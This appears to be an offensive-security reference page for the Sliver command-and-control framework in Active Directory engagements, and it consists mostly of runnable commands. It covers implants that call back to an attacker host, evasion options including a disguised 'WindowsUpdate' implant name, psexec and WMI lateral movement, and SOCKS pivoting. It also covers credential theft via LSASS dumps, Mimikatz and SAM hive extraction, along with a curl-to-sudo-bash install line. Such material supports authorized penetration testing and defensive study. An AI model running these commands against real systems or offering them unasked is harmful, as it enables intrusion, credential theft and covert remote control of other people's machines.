C2 with Sliver
Introduction to Sliver C2 framework for AD engagements: server setup, listener configuration, implant generation, session management, lateral movement modules, SOCKS tunneling, multiplayer operations, and armory extensions.
Sliver is an open-source C2 framework written in Go. It supports multiple callback protocols (mTLS, WireGuard, HTTP/S, DNS), generates cross-platform implants, and includes built-in lateral movement, credential dumping, and pivoting modules.
Installation
# Linux — official install script
curl https://sliver.sh/install | sudo bash
# Or build from source
git clone https://github.com/BishopFox/sliver.git
cd sliver && make# Start the Sliver server
sliver-server
# Connect with the client
sliver-clientListeners
Sliver uses listeners (server-side) that implants call back to.
sliver > mtls # mTLS — encrypted by default, no SNI
sliver > https # HTTPS (needs --domain for staging)
sliver > http # HTTP (cleartext — avoid in production)
sliver > dns # DNS C2 (stealthy, slow)
sliver > wireguard # WireGuard-based C2Start an mTLS listener
sliver > mtls --lport 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1Start an HTTPS listener
sliver > https --lport 443 --domain c2.corp.example.com
[*] Starting HTTPS listener ...Implant Generation
Session-based implant (interactive — persistent connection)
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format exe --save /tmp/
sliver > generate --mtls ATTACKER_IP:8888 --os linux --arch amd64 --format elf --save /tmp/
# With evasion options
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 \
--format exe --skip-symbols --evasion --save /tmp/Beacon-based implant (async — checks in at intervals — stealthier)
sliver > generate beacon --mtls ATTACKER_IP:8888 --seconds 30 --jitter 15 \
--os windows --arch amd64 --format exe --save /tmp/
# HTTPS beacon with domain fronting
sliver > generate beacon --https ATTACKER_IP:443 --seconds 60 --jitter 20 \
--os windows --arch amd64 --format exe --save /tmp/Shellcode / DLL output
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format shellcode
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format sharedSession Management
# List active sessions/beacons
sliver > sessions
sliver > beacons
# Interact with a session (by ID or name)
sliver > use SESSION_ID
sliver (IMPLANT_NAME) >
# Interact with a beacon
sliver > use BEACON_ID
sliver (BEACON_NAME) >
# Background current session
sliver (IMPLANT_NAME) > background
# Kill a session
sliver > kill SESSION_IDBasic Commands in a Session
# System info
sliver (NAME) > info
sliver (NAME) > getuid
sliver (NAME) > getpid
sliver (NAME) > getgid
sliver (NAME) > whoami
# File system
sliver (NAME) > ls
sliver (NAME) > ls /tmp
sliver (NAME) > cat /etc/passwd
sliver (NAME) > download /tmp/file.txt
sliver (NAME) > upload /local/file.exe C:\\Temp\\file.exe
sliver (NAME) > cd C:\\Windows\\Temp
# Process management
sliver (NAME) > ps
sliver (NAME) > kill PID
# Shell
sliver (NAME) > shell # interactive shell (noisy)
sliver (NAME) > execute -t 60 cmd.exe /c whoami
sliver (NAME) > execute-assembly SharpHound.exe -- -c All # run .NET assemblyLateral Movement
psexec (SMB-based)
sliver (NAME) > psexec --profile win-session TARGET_IPFirst create a profile for the session type to use:
sliver > profiles new --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format service win-sessionWMI execution
sliver (NAME) > wmiexec --username DOMAIN\\user --password pass TARGET_IPGenerate a one-off implant for a specific host
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format exe
# Drop it on TARGET_IP and executePort Forwarding / SOCKS5 Pivot
# Forward local port to remote host:port through implant
sliver (NAME) > portfwd add --remote TARGET_IP:3389
# SOCKS5 proxy through implant
sliver (NAME) > socks5 start --host 127.0.0.1 --port 1080
# Then: proxychains nxc smb INTERNAL_IP -u user -p pass
# Reverse port forward (remote → attacker)
sliver (NAME) > rportfwd add --bind-addr 0.0.0.0:8080 --forward-addr 127.0.0.1:80Credential Operations
# Dump LSASS (requires admin / SeDebugPrivilege)
sliver (NAME) > procdump --pid PID_OF_LSASS
# Run Mimikatz via execute-assembly
sliver (NAME) > execute-assembly Mimikatz.exe -- "sekurlsa::logonpasswords" "exit"
# SharpDPAPI
sliver (NAME) > execute-assembly SharpDPAPI.exe -- credentials
# SAM dump via reg save
sliver (NAME) > execute -t 30 cmd.exe /c "reg save HKLM\SAM C:\Temp\sam.hive"
sliver (NAME) > execute -t 30 cmd.exe /c "reg save HKLM\SYSTEM C:\Temp\system.hive"
sliver (NAME) > download C:\\Temp\\sam.hive
sliver (NAME) > download C:\\Temp\\system.hiveArmory — Extensions & BOFs
Sliver’s armory provides BOFs (Beacon Object Files) and C# tools:
# Install armory
sliver > armory install all
# List available packages
sliver > armory search
# Install specific package
sliver > armory install bloodhound-bot
sliver > armory install sharp-hound
# Run a BOF
sliver (NAME) > bof whoami
sliver (NAME) > bof netshareenum TARGET_IP
# Run Seatbelt (recon tool)
sliver (NAME) > execute-assembly Seatbelt.exe -- -group=userMultiplayer Mode
Sliver supports multiple operators working against the same targets:
# Create operator certificate on server
sliver-server operator --name pentest-team --lhost SERVER_IP --save /tmp/pentest-team.cfg
# Connect as operator
sliver-client import /tmp/pentest-team.cfg
sliver-clientAll operators share sessions, beacons, and implants.
Evasion Options
# Skip debug symbols (smaller binary)
--skip-symbols
# Enable evasion (anti-analysis checks)
--evasion
# Limit to one execution (implant self-destructs after first run)
--limit-singleton
# Canary domains (detects sandbox via DNS)
--canary sandbox.example.com
# Obfuscate strings at compile time
--obfuscate
# Custom implant name
--name "WindowsUpdate"Quick Reference
| Command | Purpose |
|---|---|
mtls | Start mTLS listener |
generate | Build session implant |
generate beacon | Build async beacon implant |
sessions | List active sessions |
beacons | List active beacons |
use | Interact with session/beacon |
execute | Run OS command |
execute-assembly | Run .NET assembly in memory |
psexec | Lateral movement via SMB service |
socks5 start | SOCKS5 proxy through implant |
portfwd add | Port forward through implant |
procdump | Dump process memory |
download / upload | File transfer |
armory install | Install BOFs/extensions |